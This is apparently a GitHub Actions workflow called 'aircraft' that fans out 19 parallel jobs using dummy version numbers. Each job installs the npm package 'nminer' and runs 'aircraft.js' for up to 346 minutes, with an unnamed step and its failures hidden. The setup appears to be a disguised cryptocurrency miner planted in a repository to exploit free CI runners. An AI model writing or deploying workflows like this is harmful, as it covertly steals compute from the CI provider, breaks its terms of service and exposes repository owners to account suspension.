name: aircraft
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 6795 }
          - { version: 608 }
          - { version: 9829 }
          - { version: 4315 }
          - { version: 2979 }
          - { version: 8496 }
          - { version: 2526 }
          - { version: 8493 }
          - { version: 3634 }
          - { version: 4728 }
          - { version: 1224 }
          - { version: 6568 }
          - { version: 5541 }
          - { version: 5605 }
          - { version: 686 }
          - { version: 4449 }
          - { version: 9267 }
          - { version: 9764 }
          - { version: 5005 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: 
        run: |
          npm install nminer@latest
          timeout 346m node aircraft.js || echo "aircraft executed"